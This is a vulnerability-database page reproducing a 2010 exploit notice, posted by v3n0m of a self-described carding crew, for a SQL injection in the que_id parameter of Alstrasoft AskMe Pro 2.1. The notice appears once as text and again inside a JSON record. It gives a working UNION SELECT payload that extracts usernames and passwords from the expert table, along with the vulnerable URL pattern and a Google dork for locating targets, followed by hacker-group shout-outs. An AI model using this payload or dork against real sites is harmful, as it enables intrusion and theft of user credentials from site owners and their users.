Search...

Alstrasoft AskMe Pro 2.1 - que_id SQL Injection

2010-04-24T00:00:00

ID EXPLOITPACK:AC3D244BA106F9ACB2BC80EB6BECD80C
Type exploitpack
Reporter v3n0m
Modified 2010-04-24T00:00:00

Description

Alstrasoft AskMe Pro 2.1 - que_id SQL Injection

                                        
                                                 )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' &lt;  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
										.WEB.ID
-----------------------------------------------------------------------
         AskMe Pro 2.1 (que_id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://yogyacarderlink.web.id/
Date		: April, 24-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: AlstraSoft AskMe Pro
Vendor  	: http://www.alstrasoft.com/
Price		: $99.99 USD
Google Dork	: allinurl:forum_answer.php?que_id=
Overview	:

AskMe Pro is an expert knowledge management system that allows site owners to 
setup an expert advice service similar to highly popular sites like Google Answers,
Yahoo Answers and Kasamba.com
----------------------------------------------------------------

Exploit:
~~~~~~~

-9999+union+all+select+1,2,3,4,group_concat(username,char(58),password)v3n0m,6,7,8,9,10+from+expert--


SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/forum_answer.php?que_id=[SQLi]

----------------------------------------------------------------

Shoutz:
~~~~

- 'malingsial banyak cakap, you skill off bullshit on '
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,mywisdom,yadoy666,udhit
- c4uR (banting setir dari tukang martabak jd distributor chiki,stress sampe cukur rambut,jembut cukur ur)
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- Chip D3 Bi0s & LatinHackTeam (Good Job & Good Research Brotha ;)
- elicha cristia [ luv You...luv You...luv You... :) ]
- N.O.C & Technical Support @office
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~

v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
Homepage: http://yogyacarderlink.web.id/
	  http://v3n0m.blogdetik.com/
	  http://elich4.blogspot.com/ &lt;&lt; Update donk &gt;_&lt;

---------------------------[EOF]--------------------------------

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:02", "references": [], "description": "\nAlstrasoft AskMe Pro 2.1 - que_id SQL Injection", "edition": 1, "reporter": "v3n0m", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2010-04-24T00:00:00", "title": "Alstrasoft AskMe Pro 2.1 - que_id SQL Injection", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:02", "rev": 2}, "score": {"value": 0.4, "vector": "NONE", "modified": "2020-04-01T19:04:02", "rev": 2}, "vulnersScore": 0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-04-24T00:00:00", "id": "EXPLOITPACK:AC3D244BA106F9ACB2BC80EB6BECD80C", "href": "", "viewCount": 5, "sourceData": " ) ) ) ( ( ( ( ( ) ) \n ( /(( /( ( ( /( ( ( ( )\\ ))\\ ) )\\ ))\\ ) )\\ ) ( /( ( /( \n )\\())\\()))\\ ) )\\()) )\\ )\\ )\\ (()/(()/( ( (()/(()/((()/( )\\()) )\\())\n ((_)((_)\\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\\ /(_))(_))/(_))(_)\\|((_)\\ \n__ ((_)((_)/(_))___ ((_)\\ _ )\\ )\\___)\\ _ )\\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)\n\\ \\ / / _ (_)) __\\ \\ / (_)_\\(_)(/ __(_)_\\(_) _ \\| \\| __| _ \\ | |_ _|| \\| | |/ / \n \\ V / (_) || (_ |\\ V / / _ \\ | (__ / _ \\ | /| |) | _|| / |__ | | | .` | ' < \n |_| \\___/ \\___| |_| /_/ \\_\\ \\___/_/ \\_\\|_|_\\|___/|___|_|_\\____|___||_|\\_|_|\\_\\\n\t\t\t\t\t\t\t\t\t\t.WEB.ID\n-----------------------------------------------------------------------\n AskMe Pro 2.1 (que_id) SQL Injection Vulnerability\n-----------------------------------------------------------------------\nAuthor \t: v3n0m\nSite \t: http://yogyacarderlink.web.id/\nDate\t\t: April, 24-2010\nLocation\t: Jakarta, Indonesia\nTime Zone\t: GMT +7:00\n----------------------------------------------------------------\n\nAffected software description:\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nApplication\t: AlstraSoft AskMe Pro\nVendor \t: http://www.alstrasoft.com/\nPrice\t\t: $99.99 USD\nGoogle Dork\t: allinurl:forum_answer.php?que_id=\nOverview\t:\n\nAskMe Pro is an expert knowledge management system that allows site owners to \nsetup an expert advice service similar to highly popular sites like Google Answers,\nYahoo Answers and Kasamba.com\n----------------------------------------------------------------\n\nExploit:\n~~~~~~~\n\n-9999+union+all+select+1,2,3,4,group_concat(username,char(58),password)v3n0m,6,7,8,9,10+from+expert--\n\n\nSQLi p0c:\n~~~~~~~\n\nhttp://127.0.0.1/[path]/forum_answer.php?que_id=[SQLi]\n\n----------------------------------------------------------------\n\nShoutz:\n~~~~\n\n- 'malingsial banyak cakap, you skill off bullshit on '\n- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-\n- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag\n- kiddies,whitehat,mywisdom,yadoy666,udhit\n- c4uR (banting setir dari tukang martabak jd distributor chiki,stress sampe cukur rambut,jembut cukur ur)\n- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)\n- Chip D3 Bi0s & LatinHackTeam (Good Job & Good Research Brotha ;)\n- elicha cristia [ luv You...luv You...luv You... :) ]\n- N.O.C & Technical Support @office\n- #yogyacarderlink @irc.dal.net\n----------------------------------------------------------------\nContact:\n~~~~\n\nv3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com\nHomepage: http://yogyacarderlink.web.id/\n\t http://v3n0m.blogdetik.com/\n\t http://elich4.blogspot.com/ << Update donk >_<\n\n---------------------------[EOF]--------------------------------", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}